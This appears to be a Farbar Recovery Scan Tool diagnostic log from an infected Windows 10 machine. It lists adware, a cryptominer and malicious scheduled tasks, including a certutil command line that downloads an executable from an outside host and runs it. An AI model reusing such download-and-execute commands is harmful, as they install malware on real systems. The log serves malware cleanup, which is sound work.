C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
 
 
Some files in TEMP:
====================
2018-05-24 08:56 - 2018-05-24 08:56 - 001527488 _____ (Microsoft Corporation) C:\Users\Craciun\AppData\Local\Temp\dbghelp.dll
2018-06-08 10:48 - 2018-06-09 12:19 - 000193536 _____ () C:\Users\Craciun\AppData\Local\Temp\gB3FF.tmp.exe
2018-05-24 08:39 - 2018-05-24 08:39 - 000375522 _____ (                                                            ) C:\Users\Craciun\AppData\Local\Temp\m2mw4j5chbx.exe
2018-05-24 08:56 - 2018-05-24 08:56 - 000167616 _____ (Microsoft Corporation) C:\Users\Craciun\AppData\Local\Temp\symsrv.dll
2018-05-24 20:33 - 2018-05-24 20:33 - 000052736 _____ (Z7DRQ) C:\Users\Craciun\AppData\Local\Temp\TPPHLGU5RQM8.exe
2018-06-11 00:38 - 2018-06-11 00:38 - 002064847 _____ () C:\Users\Craciun\AppData\Local\Temp\xmrig.exe
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
 
LastRegBack: 2018-05-24 00:46
 
==================== End of FRST.txt ============================
 
And here is Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Craciun (11-06-2018 21:05:29)
Running from C:\Users\Craciun\Desktop
Windows 10 Pro Version 1803 17134.48 (X64) (2018-05-23 22:18:45)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3764278317-3264620232-1554668131-500 - Administrator - Disabled)
Craciun (S-1-5-21-3764278317-3264620232-1554668131-1000 - Administrator - Enabled) => C:\Users\Craciun
DefaultAccount (S-1-5-21-3764278317-3264620232-1554668131-503 - Limited - Disabled)
Guest (S-1-5-21-3764278317-3264620232-1554668131-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3764278317-3264620232-1554668131-1002 - Limited - Enabled)
WDAGUtilityAccount (S-1-5-21-3764278317-3264620232-1554668131-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\uTorrent) (Version: 3.5.3.44396 - BitTorrent Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.5.0.331 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_1_1) (Version: 18.1.1 - Adobe Systems Incorporated)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
CloudNet (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Counter Strike 1.6 Warzone (HKLM-x32\...\{CF809AFF-2000-4A5D-B05D-130C910EF7E0}) (Version: 1.5 - Warzone) Hidden
DAEMON Tools Pro (HKLM\...\DAEMON Tools Pro) (Version: 6.1.0.0484 - Disc Soft Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 66.0.3359.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Java 8 Update 161 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180161F0}) (Version: 8.0.1610.12 - Oracle Corporation)
Lightshot-5.4.0.35 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.35 - Skillbrains)
Malwarebytes version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Maxi Buy version 1.6.24.1 (HKLM-x32\...\{716D2234-E822-4AB0-874A-1DD7F75047DB}_is1) (Version: 1.6.24.1 - Maxi Buy)
MaxiBuy (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\MaxiBuy) (Version:  - )
Microsoft OneDrive (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\OneDriveSetup.exe) (Version: 18.065.0329.0002 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61187 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61186 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.7523 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.7523 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.7523 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660 (HKLM\...\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}) (Version: 12.0.40660 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660 (HKLM\...\{CB0836EC-B072-368D-82B2-D3470BF95707}) (Version: 12.0.40660 - Microsoft Corporation)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660 (HKLM-x32\...\{7DAD0258-515C-3DD4-8964-BD714199E0F7}) (Version: 12.0.40660 - Microsoft Corporation)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660 (HKLM-x32\...\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}) (Version: 12.0.40660 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\{FD9D64F4-CAF5-3D23-845A-B843C78CC1A5}) (Version: 10.0.60830 - Microsoft Corporation)
Microsoft Visual Studio 2017 (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.11.33288.831 - Microsoft Corporation)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31233 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
RevServicesX (HKLM\...\{4A0D29CD-7A99-4F5F-B81B-115A5BB25EC4}) (Version: 4.0.8 - SystemaRev) Hidden
SafeFinder (HKLM-x32\...\{F0628398-C899-40E1-8797-66E777CE426E}) (Version: 1.0.0.0 - Linkury) <==== ATTENTION
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1258 - SUPERAntiSpyware.com)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.4.3.38 - Synaptics Incorporated)
System Healer (HKLM-x32\...\SystemHealer_is1) (Version: 4.4.0.3 - System Healer) <==== ATTENTION
System Table (HKLM-x32\...\System Table_is1) (Version:  - )
vs_filehandler_x86 (HKLM-x32\...\{2512A3CE-E1E4-46D5-8B40-28DA3AE2261E}) (Version: 15.0.26711 - Microsoft Corporation) Hidden
WhatsApp (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\WhatsApp) (Version: 0.2.8082 - WhatsApp)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-674557A57A45}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CustomCLSID: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers1: [DaemonShellExtImage] -> {40966797-8FFE-46C8-9EF8-7003F33CCF0F} => C:\Program Files\DAEMON Tools Pro\DTShl64.dll [2015-02-27] (Disc Soft Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDrive] -> {A5415364-784A-41A5-B47A-D452909CA8FF} => C:\Program Files\DAEMON Tools Pro\DTShl64.dll [2015-02-27] (Disc Soft Ltd)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2017-03-09] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {01D9EDD4-77AD-4C51-9D1A-3EC9D083ABCE} - System32\Tasks\AdobeAAMUpdater-1.0-Craciun-PC-Craciun => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2018-04-11] (Adobe Systems Incorporated)
Task: {0923B1D5-5289-4086-B6C1-05EA777A9FAF} - System32\Tasks\PPI Update => C:\WINDOWS\explorer.exe "hxxp://windowsdefender.club/warning/download.php?mn=5623" <==== ATTENTION
Task: {13F87C8D-A939-4C45-8A2B-2751C282103A} - System32\Tasks\FastDataX Task => C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE
Task: {152213FB-1763-4578-939F-96F55DAF1B52} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {25C98ADD-977F-481F-AA9A-5F7CAC3644B6} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3764278317-3264620232-1554668131-1000 => C:\Users\Craciun\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {288CC830-3E4C-4037-BDC8-35E039375BF6} - System32\Tasks\Microsoft\Windows\Multimedia\Driver => C:\WINDOWS\SysWOW64\Easeware.Driver.exe
Task: {3056F5F7-CDDE-4137-81F5-E8FECAFA2587} - System32\Tasks\System Healer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== ATTENTION
Task: {403A1486-CE91-405F-86A1-FB619623A282} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {487438D3-5615-4384-9D48-75653859EDE2} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {60BBADAD-8EB7-473A-9F3B-2BBB58D3074C} - System32\Tasks\Update_4.0.8 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64x.exe [2018-06-08] (SystemaRev)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {67D63B0D-2100-47AA-ADAC-128A2EE06F2D} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\Windows\explorer.exe /NOUACCHECK
Task: {6C2D1D6F-053C-4C3F-9322-B2A9AF69C995} - System32\Tasks\MaxiBuy2 => C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe [2018-05-02] (Python Software Foundation) <==== ATTENTION
Task: {70D00A8B-5188-4F87-8EA1-40E1C57E5F70} - System32\Tasks\jgvcz => C:\Users\Craciun\AppData\Roaming\dwirn\jgvcz.vbs [2018-05-24] ()
Task: {7E4C147E-5FA5-4A30-92BC-18492B1793A3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {816FCA72-D908-4E68-B8F9-E1A56A1ABFA7} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\Scheduler.exe
Task: {87951E4F-1C85-472A-944C-7924D58BCDCF} - System32\Tasks\Driver Booster SkipUAC (Craciun) => C:\Program Files (x86)\IObit\Driver Booster\4.4.0\DriverBooster.exe
Task: {8FBCC9C9-B649-4F2E-8354-DDF8A6D760DA} - System32\Tasks\update-S-1-5-21-3764278317-3264620232-1554668131-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {90F1558A-91F4-432C-87AB-C6AE84752474} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-24] () <==== ATTENTION
Task: {9D47BE01-7439-44C5-A803-17C31E4D30C4} - System32\Tasks\LangaCount => C:\Windows\system32\rundll32.exe "C:\Program Files\LangaCount\LangaCount.dll",rGVKtdcST <==== ATTENTION
Task: {9E72FCD0-A4C6-47F4-983F-CAF9E4F95A89} - System32\Tasks\AdobeGCInvoker-1.0-ALEX-PC-Craciun => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-05-11] (Adobe Systems, Incorporated)
Task: {A40406E5-7865-4FDA-81C3-828FDEEB4BB5} - System32\Tasks\Acronis Bar Analyptian => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Acronis Bar Analyptian\Acronis Bar Analyptian.dll",QObEek <==== ATTENTION
Task: {C73C8501-C303-477E-9ADE-DA0783F4EDA0} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\ErrorReporting => C:\\ProgramData\\WindowsErrorReporting\\wvermgr.exe
Task: {C863AAFF-BB8A-4BF4-9F92-33BA340FCAD7} - System32\Tasks\MRT => C:\Users\Craciun\AppData\Local\Temp\csrss\mrt.exe [2018-05-29] () <==== ATTENTION
Task: {D8FB4047-93CB-48C5-BE79-6E0A154183CB} - System32\Tasks\Sawmenger XP => C:\Windows\system32\rundll32.exe "C:\Program Files\Sawmenger XP\Sawmenger XP.dll",elnXHi <==== ATTENTION
Task: {DB16C6BB-4AC0-4115-BB1A-CB5F96B282D1} - System32\Tasks\UMonitor Task => C:\WINDOWS\SysWOW64\UMonit64.exe
Task: {DC995D24-AF05-4676-9569-D8937E7A3B56} - System32\Tasks\MaxiBuy => C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe [2018-05-02] (Python Software Foundation) <==== ATTENTION
Task: {E0F84829-311B-4C78-8B0B-2577CDA5A5D2} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Craciun\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Craciun\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {E8E55E52-A1B5-4A05-B29D-A8B42110978C} - System32\Tasks\Microsoft\Windows\Setup\Notifier => C:\Windows\system32\Notifier.exe
Task: {FB0096CE-D508-407F-9E4D-42A6BCEB854B} - System32\Tasks\S-1-5-21-3764278317-3264620232-1554668131-1000\DataSenseLiveTileTask => C:\Windows\System32\DataUsageLiveTileTask.exe [2018-04-12] (Microsoft Corporation)
Task: {FEEBF35B-0CD7-4809-B968-5454F7A01DCC} - System32\Tasks\System Healer Delayed => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\update-S-1-5-21-3764278317-3264620232-1554668131-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\Craciun\Favorites\Fotor for desktop.lnk -> hxxp://www.fotor.com/windows/review.htm
Shortcut: C:\Users\Craciun\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Вoйти в Интeрнeт.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) <==== Cyrillic
 
ShortcutWithArgument: C:\Users\Craciun\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Craciun\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
 
==================== Loaded Modules (Whitelisted) ==============
 
2018-06-07 20:17 - 2015-06-01 01:41 - 004997120 _____ () C:\Program Files\Sawmenger XP\Sawmenger XP.dll
2018-04-12 02:34 - 2018-04-12 02:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2017-09-26 02:52 - 2017-09-26 02:52 - 000491600 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
2018-04-12 02:34 - 2018-04-12 02:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-12 02:34 - 2018-04-12 02:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-06-11 20:25 - 2018-06-11 20:26 - 000452608 _____ () C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
2018-06-11 20:26 - 2018-06-11 20:26 - 000757760 _____ () C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\T9XH.exe
2018-05-24 11:33 - 2018-05-24 11:33 - 003913112 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll
2018-05-24 08:33 - 2018-05-24 08:33 - 001535488 _____ () C:\Program Files (x86)\Google\Chrome\Application\WINHTTP.dll
2018-05-26 14:23 - 2018-05-26 14:23 - 000342528 _____ () C:\ProgramData\Subair\Trusttansoft.dll
2018-05-16 08:31 - 2018-05-15 06:13 - 004443992 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libglesv2.dll
2018-05-16 08:31 - 2018-05-15 06:13 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libegl.dll
2017-03-09 11:16 - 2017-03-09 11:16 - 000112264 _____ () C:\Windows\System32\IccLibDll_x64.dll
2018-05-24 08:33 - 2018-05-24 08:33 - 000585216 _____ () c:\users\craciun\appdata\local\xservice\xservice.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\hola.org -> hxxp://hola.org
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2017-09-29 16:46 - 2018-05-26 21:03 - 000009752 _____ C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz
127.0.0.1 gf.tools.avast.com
127.0.0.1 pair.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 id.avast.com
127.0.0.1 s5355946.iavs9x.u.avast.com
127.0.0.1 s5355946.ivps9x.u.avast.com
127.0.0.1 s5355946.ivps9tiny.u.avast.com
127.0.0.1 s5355946.vpsnitro.u.avast.com
127.0.0.1 s5355946.vpsnitrotiny.u.avast.com
127.0.0.1 s5355946.iavs5x.u.avast.com
127.0.0.1 v7.stats.avast.com
 
There are 228 more lines.
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Craciun\Pictures\poze sau clipuri lu alex\Inu x Boku SS.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{AAAE6B21-814D-4A35-959A-82EB2DF6D010}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [UDP Query User{37813A4E-E185-4CE0-B1E1-CBCFBF6F75A1}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe
FirewallRules: [TCP Query User{599B3059-239A-4DA6-B424-152E69EE5F76}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.3_44358.exe
FirewallRules: [UDP Query User{971D7BB3-3B08-4DEC-8DD2-DEC7564607A7}C:\counter-strike 1.6\hl.exe] => (Block) C:\counter-strike 1.6\hl.exe
FirewallRules: [TCP Query User{D3827DA6-B464-4A60-A486-553A790E7169}C:\counter-strike 1.6\hl.exe] => (Block) C:\counter-strike 1.6\hl.exe
FirewallRules: [UDP Query User{C8C1F310-8342-49EA-96DD-C07D13FBB72C}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe
FirewallRules: [TCP Query User{3228BF12-AFA1-4887-9374-2E3881889F12}C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe] => (Block) C:\users\craciun\appdata\roaming\utorrent\updates\3.5.1_44332.exe
FirewallRules: [{A470BE7A-9786-4029-92E9-D2486B3436BC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
